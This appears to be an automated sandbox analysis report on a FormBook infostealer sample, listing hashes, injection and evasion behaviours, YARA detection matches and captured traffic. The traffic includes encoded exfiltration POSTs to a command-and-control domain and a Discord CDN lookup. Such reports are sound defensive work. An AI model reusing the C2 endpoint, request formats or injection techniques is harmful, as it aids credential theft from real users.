Loading ...

Play interactive tourEdit tour

Analysis Report 0001.exe

Overview

General Information

Sample Name:0001.exe
Analysis ID:255763
MD5:7d9b6c57cbd92c8be2a5acd99d0c97ad
SHA1:367bcae17a502ca3cef0bd293a3dd1cd55b7a934
SHA256:de5d696488d43ec35048aae1c3725da3325f36a4a4eb96e06b4c4932c6e224f7

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 0001.exe (PID: 6960 cmdline: 'C:\Users\user\Desktop\0001.exe' MD5: 7D9B6C57CBD92C8BE2A5ACD99D0C97AD)
    • ieinstal.exe (PID: 4592 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 5444 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
        • ieinstal.exe (PID: 5752 cmdline: 'C:\Program Files (x86)\internet explorer\ieinstal.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • ieinstal.exe (PID: 4560 cmdline: 'C:\Program Files (x86)\internet explorer\ieinstal.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Cghtttt[1]SUSP_Reversed_Base64_Encoded_EXEDetects an base64 encoded executable with reversed charactersFlorian Roth
  • 0x5d56f:$s4: AEAAAAIAAQpVT
  • 0x7ca9f:$s4: AEAAAAIAAQpVT

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18449:$sqlite3step: 68 34 1C 7B E1
    • 0x1855c:$sqlite3step: 68 34 1C 7B E1
    • 0x18478:$sqlite3text: 68 38 2A 90 C5
    • 0x1859d:$sqlite3text: 68 38 2A 90 C5
    • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.ieinstal.exe.10410000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.ieinstal.exe.10410000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.ieinstal.exe.10410000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18449:$sqlite3step: 68 34 1C 7B E1
        • 0x1855c:$sqlite3step: 68 34 1C 7B E1
        • 0x18478:$sqlite3text: 68 38 2A 90 C5
        • 0x1859d:$sqlite3text: 68 38 2A 90 C5
        • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
        4.2.ieinstal.exe.10410000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.ieinstal.exe.10410000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.498679834.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.497113298.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.317715716.0000000004A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.498454375.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 0001.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4x nop then pop ebx4_2_10417AD0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4x nop then pop edi4_2_1041E58F
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx14_2_007A7AD0
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi14_2_007B6D61
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi14_2_007AE58F
          Source: global trafficHTTP traffic detected: GET /3nop/?sPXLMT=t90IjdgfDENVc0T1Dnlw8jEGtrxzOKCpJZWtpo0gR2G0NWwGMYr6NEOXU6tP9KcCJTWz&Mvdl=2d28 HTTP/1.1Host: www.paintpartyblueprint.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: POST /3nop/ HTTP/1.1Host: www.paintpartyblueprint.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.paintpartyblueprint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.paintpartyblueprint.com/3nop/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 50 58 4c 4d 54 3d 6c 66 34 79 39 38 6f 57 64 6b 78 71 4d 44 43 76 65 77 77 59 68 56 6f 38 6d 35 39 45 5a 2d 65 6a 63 70 65 6b 31 4f 42 33 65 55 4b 51 63 6c 49 4f 47 4a 36 4f 4e 52 33 52 58 49 56 65 31 59 31 6f 50 77 33 71 6b 35 33 73 50 61 43 37 67 61 6a 4b 44 4c 4c 76 76 31 4c 2d 76 39 4e 47 76 79 79 66 72 71 59 65 73 64 32 66 75 6e 6c 46 6c 51 43 73 5a 35 54 6e 77 48 33 6d 38 45 38 44 64 73 64 37 34 61 39 79 66 4f 72 34 6a 58 38 2d 35 52 50 6c 72 51 4b 77 74 53 6f 52 73 4d 49 30 31 57 78 68 45 52 61 6e 79 54 61 62 72 4e 45 4d 49 4f 78 32 56 34 6b 77 69 30 4f 62 42 65 52 64 58 54 4b 6c 52 6e 4a 48 38 64 36 35 4f 4a 53 4d 57 30 31 59 77 46 55 31 35 69 77 70 49 66 28 78 57 52 55 47 6b 48 57 7a 48 73 75 50 73 39 51 33 46 44 63 68 4c 42 6e 6b 78 4c 78 31 55 2d 72 55 48 73 41 78 59 2d 61 61 56 42 45 4c 50 52 55 47 6a 46 50 78 33 69 70 74 4b 42 67 42 56 62 48 4f 55 4d 31 34 30 4c 54 74 6f 6c 57 68 4a 75 54 61 54 6e 7e 7a 36 4a 5a 55 6a 72 46 32 56 6b 59 62 32 56 39 49 44 4e 58 5f 55 48 36 5a 73 42 79 67 61 6c 6b 33 62 46 41 4a 4c 50 77 53 50 57 64 39 63 4a 58 56 70 37 70 6e 79 45 74 6a 6e 56 4e 73 45 57 78 45 46 45 7a 56 51 38 4e 36 6e 55 6d 71 35 6c 52 75 34 6c 46 38 38 6f 79 5f 6b 67 36 65 4c 5f 71 4f 38 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: sPXLMT=lf4y98oWdkxqMDCvewwYhVo8m59EZ-ejcpek1OB3eUKQclIOGJ6ONR3RXIVe1Y1oPw3qk53sPaC7gajKDLLvv1L-v9NGvyyfrqYesd2funlFlQCsZ5TnwH3m8E8Ddsd74a9yfOr4jX8-5RPlrQKwtSoRsMI01WxhERanyTabrNEMIOx2V4kwi0ObBeRdXTKlRnJH8d65OJSMW01YwFU15iwpIf(xWRUGkHWzHsuPs9Q3FDchLBnkxLx1U-rUHsAxY-aaVBELPRUGjFPx3iptKBgBVbHOUM140LTtolWhJuTaTn~z6JZUjrF2VkYb2V9IDNX_UH6ZsBygalk3bFAJLPwSPWd9cJXVp7pnyEtjnVNsEWxEFEzVQ8N6nUmq5lRu4lF88oy_kg6eL_qO8A).
          Source: global trafficHTTP traffic detected: POST /3nop/ HTTP/1.1Host: www.paintpartyblueprint.comConnection: closeContent-Length: 166288Cache-Control: no-cacheOrigin: http://www.paintpartyblueprint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.paintpartyblueprint.com/3nop/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 50 58 4c 4d 54 3d 6c 66 34 79 39 35 5a 6c 66 31 46 37 64 46 53 71 65 67 67 51 6c 57 68 68 69 2d 4e 54 4a 5a 79 64 56 65 76 70 31 4c 4a 37 57 31 61 4f 4e 56 59 4f 41 4b 53 4e 4c 78 33 53 41 59 56 64 78 59 6f 66 47 43 6e 59 6b 34 69 6b 50 61 4b 38 70 34 37 4c 4e 37 4b 6e 75 56 58 6f 36 75 78 64 76 78 47 71 72 50 67 57 70 64 4b 66 7a 6e 74 4c 68 31 76 2d 65 38 37 34 35 54 54 6e 76 31 56 58 64 65 5a 31 71 38 74 55 63 4b 6a 74 6e 6b 67 33 39 69 6e 42 38 7a 36 5f 68 69 55 57 67 72 59 6e 78 48 39 6c 44 51 61 76 7e 33 32 55 31 74 63 47 64 39 5a 51 57 37 6f 6e 67 45 28 39 42 64 77 6f 55 56 71 30 54 55 4e 50 7e 4d 32 54 47 63 32 4f 5a 6a 70 41 30 44 68 50 7e 54 41 47 42 2d 50 71 53 42 70 45 6c 46 65 46 61 5a 44 78 75 4d 63 37 4e 54 4d 5a 49 58 72 38 75 61 68 61 63 64 4c 48 63 76 49 50 64 38 57 34 62 42 45 67 4a 52 56 4a 72 56 75 52 39 32 5a 69 4f 51 77 72 55 64 48 61 54 59 46 31 31 4a 37 4c 6c 6b 28 35 47 38 7a 4f 59 7a 61 48 7e 70 4d 5a 6a 38 6c 56 66 45 5a 43 6a 44 42 42 44 4e 58 5a 55 47 37 2d 74 31 53 67 5a 52 6f 43 66 69 73 56 4e 50 77 50 4a 47 74 37 48 4f 58 46 70 37 78 6e 67 45 39 4e 6c 6d 64 73 44 46 5a 44 45 68 48 56 57 4d 4e 36 76 30 6e 4b 77 30 4e 68 79 58 52 6a 78 2d 4f 6e 6e 46 79 4f 48 39 76 51 72 54 62 6c 28 6f 6f 39 59 6d 57 52 54 69 55 55 70 62 74 55 74 35 32 64 64 6f 5a 38 50 39 59 51 65 38 61 41 48 73 4f 55 53 63 69 39 42 6a 55 4b 7a 4c 4a 6a 75 5a 51 53 61 4e 65 4c 7e 4f 56 5a 6f 59 73 4f 39 52 7a 62 4a 31 73 36 44 58 58 44 74 55 65 34 74 58 61 74 79 75 42 5a 70 54 4c 32 76 4a 64 5a 7a 39 66 43 6b 51 36 31 38 45 75 4a 63 6c 74 4b 65 6a 4c 6c 75 66 45 51 79 33 70 4f 4c 45 33 44 37 4e 46 6c 4a 47 37 69 39 44 52 65 79 6c 28 63 54 48 4c 6d 45 63 4b 49 39 7a 4e 65 4f 63 72 50 50 4f 4e 4c 50 58 54 7a 73 6f 32 50 4c 6a 63 57 69 79 48 4c 53 52 78 67 46 5a 49 56 4f 33 78 2d 76 47 57 6e 41 67 65 57 67 55 34 6c 67 6a 6e 4b 54 77 73 64 37 62 6d 42 39 58 7e 4b 56 4a 68 51 73 32 73 39 37 45 45 59 28 76 63 53 5a 47 77 64 58 5a 63 55 63 46 52 69 28 4c 47 6a 6f 4b 71 62 51 4f 4e 73 39 53 63 59 32 30 38 64 38 65 67 62 54 54 79 57 79 48 70 79 75 65 55 61 6d 43 65 37 68 58 28 7a 6f 52 52 71 43 49 39 58 4f 75 46 49 56 53 7e 42 59 6d 49 59 71 56 46 42 65 79 43 56 63 4f 54 2d 39 4c 6f 79 36 45 69 59 6b 6b 49 77 56 55 36 63 55 39 64 41 63 71 6b 52 68 34 79 4c 35 4b 49 50 6e 44 54 71 69 6d 4f 61 6d 4f 42 66 50 49 45 65 38 33 43 43 4b 64 66 47 4c 72 4a 30 28 46 57 2d 56 4c 6a 75 42 7a 6a 4a 63 4c 41 55 4e 4c 46 2d 55 6a 4f 50 75 5a 63 73 68 35 28 56 6d 6e 70 41 49 6b 5a 63 53 6f 47 57 54 4f 4d 53 6c 78 74 39 67 52 4d 35 7e 52 4c 51
          Source: global trafficHTTP traffic detected: GET /3nop/?sPXLMT=t90IjdgfDENVc0T1Dnlw8jEGtrxzOKCpJZWtpo0gR2G0NWwGMYr6NEOXU6tP9KcCJTWz&Mvdl=2d28 HTTP/1.1Host: www.paintpartyblueprint.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: unknownHTTP traffic detected: POST /3nop/ HTTP/1.1Host: www.paintpartyblueprint.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.paintpartyblueprint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.paintpartyblueprint.com/3nop/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 50 58 4c 4d 54 3d 6c 66 34 79 39 38 6f 57 64 6b 78 71 4d 44 43 76 65 77 77 59 68 56 6f 38 6d 35 39 45 5a 2d 65 6a 63 70 65 6b 31 4f 42 33 65 55 4b 51 63 6c 49 4f 47 4a 36 4f 4e 52 33 52 58 49 56 65 31 59 31 6f 50 77 33 71 6b 35 33 73 50 61 43 37 67 61 6a 4b 44 4c 4c 76 76 31 4c 2d 76 39 4e 47 76 79 79 66 72 71 59 65 73 64 32 66 75 6e 6c 46 6c 51 43 73 5a 35 54 6e 77 48 33 6d 38 45 38 44 64 73 64 37 34 61 39 79 66 4f 72 34 6a 58 38 2d 35 52 50 6c 72 51 4b 77 74 53 6f 52 73 4d 49 30 31 57 78 68 45 52 61 6e 79 54 61 62 72 4e 45 4d 49 4f 78 32 56 34 6b 77 69 30 4f 62 42 65 52 64 58 54 4b 6c 52 6e 4a 48 38 64 36 35 4f 4a 53 4d 57 30 31 59 77 46 55 31 35 69 77 70 49 66 28 78 57 52 55 47 6b 48 57 7a 48 73 75 50 73 39 51 33 46 44 63 68 4c 42 6e 6b 78 4c 78 31 55 2d 72 55 48 73 41 78 59 2d 61 61 56 42 45 4c 50 52 55 47 6a 46 50 78 33 69 70 74 4b 42 67 42 56 62 48 4f 55 4d 31 34 30 4c 54 74 6f 6c 57 68 4a 75 54 61 54 6e 7e 7a 36 4a 5a 55 6a 72 46 32 56 6b 59 62 32 56 39 49 44 4e 58 5f 55 48 36 5a 73 42 79 67 61 6c 6b 33 62 46 41 4a 4c 50 77 53 50 57 64 39 63 4a 58 56 70 37 70 6e 79 45 74 6a 6e 56 4e 73 45 57 78 45 46 45 7a 56 51 38 4e 36 6e 55 6d 71 35 6c 52 75 34 6c 46 38 38 6f 79 5f 6b 67 36 65 4c 5f 71 4f 38 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: sPXLMT=lf4y98oWdkxqMDCvewwYhVo8m59EZ-ejcpek1OB3eUKQclIOGJ6ONR3RXIVe1Y1oPw3qk53sPaC7gajKDLLvv1L-v9NGvyyfrqYesd2funlFlQCsZ5TnwH3m8E8Ddsd74a9yfOr4jX8-5RPlrQKwtSoRsMI01WxhERanyTabrNEMIOx2V4kwi0ObBeRdXTKlRnJH8d65OJSMW01YwFU15iwpIf(xWRUGkHWzHsuPs9Q3FDchLBnkxLx1U-rUHsAxY-aaVBELPRUGjFPx3iptKBgBVbHOUM140LTtolWhJuTaTn~z6JZUjrF2VkYb2V9IDNX_UH6ZsBygalk3bFAJLPwSPWd9cJXVp7pnyEtjnVNsEWxEFEzVQ8N6nUmq5lRu4lF88oy_kg6eL_qO8A).
          Source: explorer.exe, 00000005.00000000.289493552.000000000A9D0000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000005.00000000.289493552.000000000A9D0000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.294770647.000000000EAD1000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
